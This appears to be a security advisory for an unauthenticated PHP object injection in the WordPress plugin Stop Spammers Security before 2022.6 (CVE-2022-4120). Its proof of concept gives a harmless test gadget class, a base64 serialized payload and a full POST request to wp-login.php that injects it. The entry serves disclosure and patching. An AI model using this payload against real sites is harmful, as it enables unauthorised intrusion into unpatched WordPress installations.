Lucene search
Seryeon HamWPEX-ID:E8BB79DB-EF77-43BE-B449-4C4B5310EEDFHistoryDec 05, 2022 - 12:00 a.m.
Stop Spammers Security < 2022.6 - Unauthenticated PHP Object Injection
2022-12-0500:00:00
Seryeon Ham
77
php object injection
security
plugin code
request manipulation
exploit attempt
captcha
base64 payload
post request
0.003 Low
EPSS
Percentile
65.4%
The plugin passes base64 encoded user input to the unserialize() PHP function when CAPTCHA are used as second challenge, which could lead to PHP Object injection if a plugin installed on the blog has a suitable gadget chain
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
On a page where the request is blocked and the second challenge is set to a CAPTCHA (such as reCAPTCHA), send dummy data, intercept it and change the kp parameter with the following payload: Tzo0OiJFdmlsIjowOnt9Ow== (which is the base64 of O:4:"Evil":0:{};)
POST /wp-login.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 176
Connection: close
Upgrade-Insecure-Requests: 1
kn=6dc52e6b54&ss_block=G&kp=Tzo0OiJFdmlsIjowOnt9Ow%3D%3D&kr=Allow+List+Email%3A+block%40email.com&ka=block%40email.com&ke=cwenf&km=cc&recaptcha=recaptcha&g-recaptcha-response=
Related
nvd
nvd
CVE-2022-4120
2022-12-26 13:15:12
prion
prion
Code injection
2022-12-26 13:15:00
cvelist
cvelist
wpvulndb
wpvulndb
Stop Spammers Security < 2022.6 - Unauthenticated PHP Object Injection
2022-12-05 00:00:00
cve
cve
CVE-2022-4120
2022-12-26 13:15:12